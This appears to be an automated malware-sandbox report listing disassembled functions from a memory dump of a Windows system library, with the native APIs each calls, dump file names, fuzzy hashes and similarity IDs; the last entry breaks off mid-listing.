Opcode Fuzzy Hash: f6b9efe4b52a4856d400988c6c8340c43cb80f0ce6ef2e524c0764acaf3af869
Instruction Fuzzy Hash: E4310432A41584AFEB21CE68C880F5E73BAEF85754F229069ED149B201DF75DD40EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6AB66730, Relevance: 6.1, APIs: 4, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AB6674F
RtlGetCurrentServiceSessionId.1105(00000001), ref: 6AB6677C
RtlDebugPrintTimes.1105(?,?,?,?,00000001), ref: 6AB667B1
RtlGetCurrentServiceSessionId.1105 ref: 6AB667B9

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$DebugPrintTimes
String ID:
API String ID: 286911700-0
Opcode ID: d4f305635f14191b7159036e19bcffdb98eb76e34fe7cb1ab4cae0604d66ab59
Instruction ID: 203bde0cb2a83533cec17357c9b00dc10bd22279bd649dc5ef409965da7e0125
Opcode Fuzzy Hash: d4f305635f14191b7159036e19bcffdb98eb76e34fe7cb1ab4cae0604d66ab59
Instruction Fuzzy Hash: 6A31E031205A85BFCB458B28DA54E9ABBA2FF45714F005021EC1197A62EF31E830EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6AB91DB5, Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

RtlQueryInformationActivationContext.1105(-40000003,?,00000000,00000006,00000000,00000000,00000000,00000000,?,?,?,00000040,-00000054,00000000), ref: 6AB91DF7
RtlQueryInformationActivationContext.1105(-40000003,-00000054,00000000,00000006,00000000,00000000,00000000,-40000003,?,00000000,00000006,00000000,00000000,00000000,00000000,?), ref: 6AB91E36

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActivationContextInformationQuery
String ID:
API String ID: 2130846384-0
Opcode ID: 39ad629a20701d3ed16c14f322ca06b3d590f6998de82038df02d262996ece3b
Instruction ID: 92b5397058dfd9a2bbde2411077a2a9e1fb294bb62648386033b86926ccea929
Opcode Fuzzy Hash: 39ad629a20701d3ed16c14f322ca06b3d590f6998de82038df02d262996ece3b
Instruction Fuzzy Hash: 63219F71A40599FBD710CF99DC80EABBBBDEF86644F164065E90097211DB34AE01E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB93B7A, Relevance: 6.1, APIs: 4, Instructions: 75memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6AB93BB0
ZwQuerySystemInformationEx.1105(0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6AB93BCF
memset.1105(6ABD43AB,00000000,?,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6AB93BEA
RtlFreeHeap.1105(?,?,00000000,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6AB93C30

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFreeInformationQuerySystemmemset
String ID:
API String ID: 21860560-0
Opcode ID: 2cd19753227fb0ebed9867892cf9ef0ba36bb077a1f959c66e77559442f1d73f
Instruction ID: 11afd61d78bc048788f379a873cb54aa6f77868d0afe908f74e64daadc8a0c4e
Opcode Fuzzy Hash: 2cd19753227fb0ebed9867892cf9ef0ba36bb077a1f959c66e77559442f1d73f
Instruction Fuzzy Hash: 42218072A00548AFDB00DF98CD95F5EBBBDFB45708F160068E908EB252DB71AD11EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB918B9, Relevance: 6.1, APIs: 4, Instructions: 75nativetimeCOMMON

Download Yara Rule

APIs

ZwCreateTimer2.1105(00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6AB918E6
ZwCreateWaitCompletionPacket.1105(0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6AB918F6
ZwAssociateWaitCompletionPacket.1105(?,00000000,00000058,00000060,?,00000000,?,?,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002), ref: 6AB91926
ZwClose.1105(00000058,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6ABD5690

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionCreatePacketWait$AssociateCloseTimer2
String ID:
API String ID: 56835937-0
Opcode ID: 34784545bacadddaee46839b5ec09e817314b9b741063eb53df1a7f4a4f27c95
Instruction ID: dc6fb5964f284e00f44647d53c96779589df6aac2f0db8b141e81d723c8982e3
Opcode Fuzzy Hash: 34784545bacadddaee46839b5ec09e817314b9b741063eb53df1a7f4a4f27c95
Instruction Fuzzy Hash: 2821A4B1A00249BFD740CF59C884E9ABFB8FF49348F10806DE64497241DB71E926EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64DC0, Relevance: 6.1, APIs: 4, Instructions: 73nativeCOMMON

Download Yara Rule

APIs

RtlWakeAddressAllNoFence.1105(00000000), ref: 6AB64DE8
RtlRaiseStatus.1105(00000000,?,?,?,6AB7EBD0,?,?,?,?,00000000,?,6AB61E03,?,6AB61D6E,?), ref: 6AB64E04
ZwAlpcQueryInformation.1105(?,0000000B,FFFFFFFE,00000004,00000000,00000000,000000FF,?,?,00000000,?,?,?,6AB7EBD0,?,?), ref: 6ABC0B73

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAlpcFenceInformationQueryRaiseStatusWake
String ID:
API String ID: 3812654406-0
Opcode ID: 5d5570f8a10cb7a806a67cbbe6a9f52131e3c8302fa82ec5a631861a7e33764d
Instruction ID: f612044ed1e46e19f1594d0e280bf1b2bce4c18f0ff51620cdc8d4cbd8ac0a50
Opcode Fuzzy Hash: 5d5570f8a10cb7a806a67cbbe6a9f52131e3c8302fa82ec5a631861a7e33764d
Instruction Fuzzy Hash: 4E112331A01B84BBEB24CA34CC15FAF779CDF45714F02002AEA25C7180EFB1ED00A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF8372, Relevance: 6.1, APIs: 4, Instructions: 72nativeCOMMON

Download Yara Rule

APIs

ZwClose.1105(00000000,?,00000000,00000000), ref: 6ABF839C
RtlStringFromGUIDEx.1105(?,?,00000001,?,00000000,00000000), ref: 6ABF83B9
ZwCreateKey.1105(?,?,00000018,00000000,00000000,00000000,00000001,?,?,00000001,?,00000000,00000000), ref: 6ABF83F5
RtlFreeUnicodeString.1105(?,?,?,00000018,00000000,00000000,00000000,00000001,?,?,00000001,?,00000000,00000000), ref: 6ABF8400

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$CloseCreateFreeFromUnicode
String ID:
API String ID: 4294597832-0
Opcode ID: a8b4603f00ee6654ec96b3c2f5060ced591a0e8a38f623a4283267df8e5136d9
Instruction ID: 2c32ce3b21ac9e5f8591db00d02c9576d32c563e07a5c0dd1f9a9dd17d70eee7
Opcode Fuzzy Hash: a8b4603f00ee6654ec96b3c2f5060ced591a0e8a38f623a4283267df8e5136d9
Instruction Fuzzy Hash: 43215EB1D0160DAFCB05CFA9C8859EFB7F8EB04714F11456AE910F7201EB309D099BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA3EE4, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000008,00000028,?,?,6AB746F9,00000000,00000000,00000001), ref: 6ABA3F07
RtlGetLocaleFileMappingAddress.1105(00000001,6AC565D4,6AB746F9,?,00000008,00000028,?,?,6AB746F9,00000000,00000000,00000001), ref: 6ABA3F23

Part of subcall function 6ABA3FA0: ZwInitializeNlsFiles.1105(00000028,00000008,?,?,?,00000000,?,6ABA3F28,00000001,6AC565D4,6AB746F9,?,00000008,00000028,?), ref: 6ABA3FCD

RtlFreeHeap.1105(?,00000000,00000000,00000001,6AC565D4,6AB746F9,?,00000008,00000028,?,?,6AB746F9,00000000,00000000,00000001), ref: 6ABDE7D3
RtlFreeHeap.1105(?,00000000,00000000,00000001,6AC565D4,6AB746F9,?,00000008,00000028,?,?,6AB746F9,00000000,00000000,00000001), ref: 6ABDE7EB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AddressAllocateFileFilesInitializeLocaleMapping
String ID:
API String ID: 1831200515-0
Opcode ID: b5daf3641a9f24272012e037f92dd408de49a10bcabd288be9add73fe130eac4
Instruction ID: 151834f50cc3514e9d1034532ba9c2f3abd238e1664a16eba6a5e453ce0f1512
Opcode Fuzzy Hash: b5daf3641a9f24272012e037f92dd408de49a10bcabd288be9add73fe130eac4
Instruction Fuzzy Hash: 5821CF79601A40DFCB24DF28C940B5AB7F5FF08708F1444A8E519CB722EB31E852DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6519E, Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6AB652A5: RtlEnterCriticalSection.1105(6AC579A0,?,00000000,?), ref: 6AB652BF
Part of subcall function 6AB652A5: RtlLeaveCriticalSection.1105(6AC579A0,6AC579A0,?,00000000,?), ref: 6AB652DD

RtlEqualUnicodeString.1105(?,?,00000001,?,?,?), ref: 6ABC0CCB
RtlLeaveCriticalSection.1105(6AC579A0,?,?,?), ref: 6ABC0CE4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterEqualStringUnicode
String ID:
API String ID: 4283003422-0
Opcode ID: 45bed35615ddcd2e850772d39497c794462f9d333bf4e06039725887a46298e7
Instruction ID: 911bfaa72fc9daccd9a8fef91492ae13671078a40289baa1cae2d1ffa3b16f0b
Opcode Fuzzy Hash: 45bed35615ddcd2e850772d39497c794462f9d333bf4e06039725887a46298e7
Instruction Fuzzy Hash: EA115974942281ABCB209F2CC850EAABBF5EF15714F11022AE45793341EF31CD91F751

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6A745, Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0,00000084), ref: 6AB6A757
RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0), ref: 6AB6A774
RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0), ref: 6ABC442E
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD), ref: 6ABC443F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$AcquireFreeHeap
String ID:
API String ID: 2563869513-0
Opcode ID: be86e9846266140d25c92138998b7034213e245d0bec7dd92905d36f6556d5da
Instruction ID: de2f49c0b521e16359ed548abec36d19f13a040483caa01956c372112b6ab7ee
Opcode Fuzzy Hash: be86e9846266140d25c92138998b7034213e245d0bec7dd92905d36f6556d5da
Instruction Fuzzy Hash: 7E01D2722422449BC720DF3DDC14E6AB7B8EB42328B1542AAE419CB242DF74DC51EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6AB93B5A, Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,?,?,6AB93AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6ABD6208
RtlFreeHeap.1105(?,?,?,6AB93AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6ABD622C
RtlFreeHeap.1105(?,?,?,6AB93AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6ABD6250
RtlFreeHeap.1105(?,?,00000000,6AB93AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6ABD626D

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5e5fc1c3e28f450ba4c19dbd1b45df79a8407f12697f92ca0b0ce8c055283d83
Instruction ID: b4032f79112a20fb77d7d650687ec08c1536d25afc152ccd4c494efae1dd7d7a
Opcode Fuzzy Hash: 5e5fc1c3e28f450ba4c19dbd1b45df79a8407f12697f92ca0b0ce8c055283d83
Instruction Fuzzy Hash: EF11F8766119949FCB15DB58CA60F5AB7B9FB08608F16006CE815A7762CB28EC10EB94

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8E090, Relevance: 6.0, APIs: 4, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

RtlWow64EnableFsRedirectionEx.1105(6AC3FE18,6AC3FE18,6AB8DFDF,?), ref: 6AB8E0A6
RtlEnterCriticalSection.1105(6AC57B60,6AB8DFDF,?), ref: 6AB8E0B7
RtlLeaveCriticalSection.1105(6AC57B60,6AC57B60,6AB8DFDF,?), ref: 6AB8E0DC
ZwSetEvent.1105(00000000,6AC57B60,6AC57B60,6AB8DFDF,?), ref: 6AB8E0EF

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnableEnterEventLeaveRedirectionWow64
String ID:
API String ID: 355146318-0
Opcode ID: c55e58d5a0de2cfed5d0f1ed29d71599b31111b5a1f48d28bfe11d466b299766
Instruction ID: b2285c381929d361bfcd0924d4d5e0d4d492e67759e1c85cd551647d894f5424
Opcode Fuzzy Hash: c55e58d5a0de2cfed5d0f1ed29d71599b31111b5a1f48d28bfe11d466b299766
Instruction Fuzzy Hash: 9B01ADB0C061C8AEEF119B788845B8E7AB5EB07318F418825E000A2212CF298CA0F725

Uniqueness

Uniqueness Score: -1.00%

Function 6AC0EB8A, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.1105(?,?,?,?,?,6AC22783,00000001,?,00000000,?,?,?,?,6ABBFC15), ref: 6AC0EBB6
RtlGetCurrentServiceSessionId.1105(?,?,?,6AC22783,00000001), ref: 6AC0F23E

Strings

@, xrefs: 6AC0F10A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDebugPrintServiceSessionTimes
String ID: @
API String ID: 358024996-2766056989
Opcode ID: 0acd791d7442d6af9508072a01464ec6e814eadc07367eac06feb96545d69666
Instruction ID: fda0d95ac5709d922b60a043cc2a4b9b43f8f8fe155d4829028d4da2e78459dd
Opcode Fuzzy Hash: 0acd791d7442d6af9508072a01464ec6e814eadc07367eac06feb96545d69666
Instruction Fuzzy Hash: 9732D1782447659FD724CF2AC090372B7E1FF46704F05845AE8A58F285FB36E896CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA0E21, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000618,?,?), ref: 6ABA0EDA
RtlRaiseException.1105 ref: 6ABDCC58

Strings

Flst, xrefs: 6ABA0E63

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExceptionHeapRaise
String ID: Flst
API String ID: 3789339297-2374792617
Opcode ID: 2eb510322afed031af7922008d0e649f85cd39c923c1e9083930774b6ff9601e
Instruction ID: 98f9945bf2f778f54d379949fabc1405c75906fc30ab1cd701046dc705fff5f7
Opcode Fuzzy Hash: 2eb510322afed031af7922008d0e649f85cd39c923c1e9083930774b6ff9601e
Instruction Fuzzy Hash: DD41BAB1A09341DFC314CF28D580616FBE4EF4AB10F15856EE659CB291DB31D841EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6AB62240, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99memorytimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000034,?,?,?,?,?,?,?,?,?,6AC3F350,0000004C), ref: 6AB622AC
TpAllocTimer.1105(00000020,6AC39440,00000000,00000003,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6AB6235A

Strings

(, xrefs: 6AB62328

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocAllocateHeapTimer
String ID: (
API String ID: 2926205940-3887548279
Opcode ID: 04021ee8b9f4cd63732bb69441c87e28b46f9a4d92d0209c72bca653a596efaf
Instruction ID: e62e456f7d0ffece51c0ba792ace07d6b629d2c17e1835688e9c3b046fd63555
Opcode Fuzzy Hash: 04021ee8b9f4cd63732bb69441c87e28b46f9a4d92d0209c72bca653a596efaf
Instruction Fuzzy Hash: 384124B0E1169AEFDB10CFA8C480ACDBBB4BF0C714F11565AE848AB641CBB49951DF94

Uniqueness

Uniqueness Score: -1.00%

Function 6AB666D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.1105(?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB666F5
ZwQueryValueKey.1105(?,?,00000002,?,00000014,?,?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB6670B

Strings

UBR, xrefs: 6AB666EE

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitQueryStringUnicodeValue
String ID: UBR
API String ID: 3766860702-3525060630
Opcode ID: 6f9088cb38456368a50e2750048da3a3666a09ecf6f16799576dfce3368982c7
Instruction ID: 346ef109dd0a8b34d3493fdb36f7cf5642fb5c7720b4839b4179db7ca2972409
Opcode Fuzzy Hash: 6f9088cb38456368a50e2750048da3a3666a09ecf6f16799576dfce3368982c7
Instruction Fuzzy Hash: A2017C71A0514DAFDB00CE98C805DFFB3FCEB45714F000066E915E7100EB31AE4597A2

Uniqueness

Uniqueness Score: -1.00%

Function 6AC18DF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DbgPrintEx.1105(00000065,00000000,Critical error detected %lx,?,6AC40D50,00000074,6AC220A2,?,?,6AC1FFAF,00000001,00000020,6AC558C0,00000000), ref: 6AC18E2A
RtlRaiseException.1105(?), ref: 6AC18E74

Strings

Critical error detected %lx, xrefs: 6AC18E21

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionPrintRaise
String ID: Critical error detected %lx
API String ID: 1813208005-802127002
Opcode ID: 6ac62f0c4ff6d4e4da2deb55bd63b9b834da5ffc1d545ea4c881b4f7d09f591c
Instruction ID: 8150fd4f2663ba971c70897e9ce792d5895cbdcfc4cd7dbe19cbd637ba95203e
Opcode Fuzzy Hash: 6ac62f0c4ff6d4e4da2deb55bd63b9b834da5ffc1d545ea4c881b4f7d09f591c
Instruction Fuzzy Hash: FF118E79D09388EBDF14CFA49545B9CBBB0BF04314F20426DD128AB292DB345A02EF14

Uniqueness

Uniqueness Score: -1.00%

Function 6AC2E2C5, Relevance: 4.7, APIs: 3, Instructions: 202COMMON

Download Yara Rule

APIs

_aullshr.1105(-00000044,?,?,00000000,00000000,?,00000001,00000000,00000000,00000000,?,?,6AC22783,00000001), ref: 6AC2E325
RtlAcquireSRWLockShared.1105(0000000C,-00000044,?,?,00000000,00000000,?,00000001,00000000,00000000), ref: 6AC2E45E
RtlReleaseSRWLockShared.1105(0000000C,0000000C,-00000044,?,?,00000000,00000000,?,00000001,00000000,00000000), ref: 6AC2E48D

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: LockShared$AcquireRelease_aullshr
String ID:
API String ID: 815091738-0
Opcode ID: f94cb1d13a2ccbdc7da9c6d4c2d44c05834ee763510cd3782f8120f9f66dbf83
Instruction ID: 64ee89c1c5376b7a8c928359bb3e7551c5802d4cae332b29a9558fb08aa76c4f
Opcode Fuzzy Hash: f94cb1d13a2ccbdc7da9c6d4c2d44c05834ee763510cd3782f8120f9f66dbf83
Instruction Fuzzy Hash: 0C61A475A006299F9B14CFBDC8845ADBBF2FB8A325715436AD425E73C0EB349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA3D43, Relevance: 4.6, APIs: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000022,00000024,00000000,?,?,01000000,00000000), ref: 6ABA3D84
RtlAppendUnicodeStringToString.1105(00000000,6AB411C4,00000024,00000000,?,?,01000000,00000000), ref: 6ABA3DA3

Part of subcall function 6AB77B60: memmove.1105(?,?,00000024,00000022,00000000,00000024,00000000,?,6ABA3DA8,00000000,6AB411C4,00000024,00000000,?,?,01000000), ref: 6AB77B9D

RtlAppendUnicodeStringToString.1105(00000000,01000000,00000000,6AB411C4,00000024,00000000,?,?,01000000,00000000), ref: 6ABA3DC4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AppendUnicode$AllocateHeapmemmove
String ID:
API String ID: 400542772-0
Opcode ID: 721ed06a9b3b98f64bc34cb71fba880c161d52283c1ba73ab6f12bf4f1c69126
Instruction ID: 2831d5c74fffb8bbd17938eac2269c222681a0350227f88828dd0b5fcf2f4cb1
Opcode Fuzzy Hash: 721ed06a9b3b98f64bc34cb71fba880c161d52283c1ba73ab6f12bf4f1c69126
Instruction Fuzzy Hash: BF31C439609695DBC725CF2DD441A6BFBF5EF46700B06806AE585CB361EF30D850E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9E730, Relevance: 4.6, APIs: 3, Instructions: 89memorynativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationProcess.1105(000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6ABFFF7D,6AC409B0,00000014,6AB7EBD8,?,?,?,00000000), ref: 6AB9E742
RtlRaiseStatus.1105(00000000,000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6ABFFF7D,6AC409B0,00000014,6AB7EBD8,?,?,?,00000000), ref: 6AB9E765
RtlAllocateHeap.1105(?,?,?,?,FFFFFFFE,?,?,00000000,000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6ABFFF7D), ref: 6AB9E7A3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
